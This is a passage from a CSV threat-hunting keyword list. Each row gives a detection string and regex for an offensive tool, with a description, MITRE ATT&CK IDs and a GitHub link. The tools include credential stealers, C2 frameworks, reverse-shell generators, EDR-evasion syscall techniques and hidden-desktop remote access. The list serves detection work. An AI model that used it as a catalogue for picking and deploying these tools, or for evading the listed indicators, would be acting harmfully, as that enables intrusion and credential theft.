Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb.ad_ldap*",".{0,1000}hekatomb\.ad_ldap.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*hekatomb@thiefin.fr*",".{0,1000}hekatomb\@thiefin\.fr.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hekatomb_dump*",".{0,1000}hekatomb_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*HellHall-main.zip*",".{0,1000}HellHall\-main\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*hello %3e c:\\temp\\test.txt*",".{0,1000}hello\s\%3e\sc\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*Hello from DCShadow*",".{0,1000}Hello\sfrom\sDCShadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Hello from DllMain-PROCESS_ATTACH in Merlin!*",".{0,1000}Hello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin!.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*Hello from KaynLdr*",".{0,1000}Hello\sfrom\sKaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*Hello from Malicious DLL*",".{0,1000}Hello\sfrom\sMalicious\sDLL.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*Hello From sadsad Team*",".{0,1000}Hello\sFrom\ssadsad\sTeam.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - 
T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*Hello, you have been pwned!*",".{0,1000}Hello,\syou\shave\sbeen\spwned!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*HelloReflectionWorld.exe*",".{0,1000}HelloReflectionWorld\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*hellsgate.asm*",".{0,1000}hellsgate\.asm.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.exe*",".{0,1000}HellsGate\.exe.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.sln*",".{0,1000}HellsGate\.sln.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*HellsGate.vcxproj*",".{0,1000}HellsGate\.vcxproj.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*Hell'sHall.vcxproj*",".{0,1000}Hell\'sHall\.vcxproj.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*Hell'sHall-Clang&NoCrt.zip*",".{0,1000}Hell\'sHall\-Clang\&NoCrt\.zip.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*help\dll.txt*",".{0,1000}help\\dll\.txt.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "*helpers.gpoddity_smbserver*",".{0,1000}helpers\.gpoddity_smbserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*Henkru/cs-token-vault*",".{0,1000}Henkru\/cs\-token\-vault.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*henriksb/ExtensionSpoofer*",".{0,1000}henriksb\/ExtensionSpoofer.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*henry-richard7/Browser-password-stealer*",".{0,1000}henry\-richard7\/Browser\-password\-stealer.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Here are the oneliners for reverse shell using rpc named 
pipes*",".{0,1000}Here\sare\sthe\soneliners\sfor\sreverse\sshell\susing\srpc\snamed\spipes.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*Heroinn FTP*",".{0,1000}Heroinn\sFTP.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_client*",".{0,1000}heroinn_client.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_core*",".{0,1000}heroinn_core.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_ftp*",".{0,1000}heroinn_ftp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_shell*",".{0,1000}heroinn_shell.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*heroinn_util*",".{0,1000}heroinn_util.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnApp*",".{0,1000}HeroinnApp.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnProtocol*",".{0,1000}HeroinnProtocol.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*HeroinnServerCommand*",".{0,1000}HeroinnServerCommand.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - 
T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*herrcore/LocalShellExtParse*",".{0,1000}herrcore\/LocalShellExtParse.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","1","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*Hey Dear! You Have Won Free Rs 399 Jio Recharge*",".{0,1000}Hey\sDear!\sYou\sHave\sWon\sFree\sRs\s399\sJio\sRecharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*hfiref0x/UACME*",".{0,1000}hfiref0x\/UACME.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5924","1287","2024-04-17T00:56:06Z","2015-03-28T12:04:33Z" "*hfiref0x/WDExtract*",".{0,1000}hfiref0x\/WDExtract.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Hibr2Dmp.exe*",".{0,1000}Hibr2Dmp\.exe.{0,1000}","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with 
hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*Hidden.Desktop.mp4*",".{0,1000}Hidden\.Desktop\.mp4.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop * *",".{0,1000}HiddenDesktop\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.*",".{0,1000}HiddenDesktop\..{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.cpp*",".{0,1000}HiddenDesktop\.cpp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HiddenDesktop.exe*",".{0,1000}HiddenDesktop\.exe.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HiddenDesktop.x64.bin*",".{0,1000}HiddenDesktop\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.x86.bin*",".{0,1000}HiddenDesktop\.x86\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop.zip*",".{0,1000}HiddenDesktop\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HiddenDesktop_ControlWindow*",".{0,1000}HiddenDesktop_ControlWindow.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HiddenUser.ps1*",".{0,1000}HiddenUser\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" 
"*hide-implant*",".{0,1000}hide\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*HideProcess*",".{0,1000}HideProcess.{0,1000}","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","6","588","111","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z" "*HIJACK_DLL_PATH*",".{0,1000}HIJACK_DLL_PATH.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*hijack_hunter *",".{0,1000}hijack_hunter\s.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*hijack_remote_thread*",".{0,1000}hijack_remote_thread.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*hijackablepath.c*",".{0,1000}hijackablepath\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*hijackablepath.o*",".{0,1000}hijackablepath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
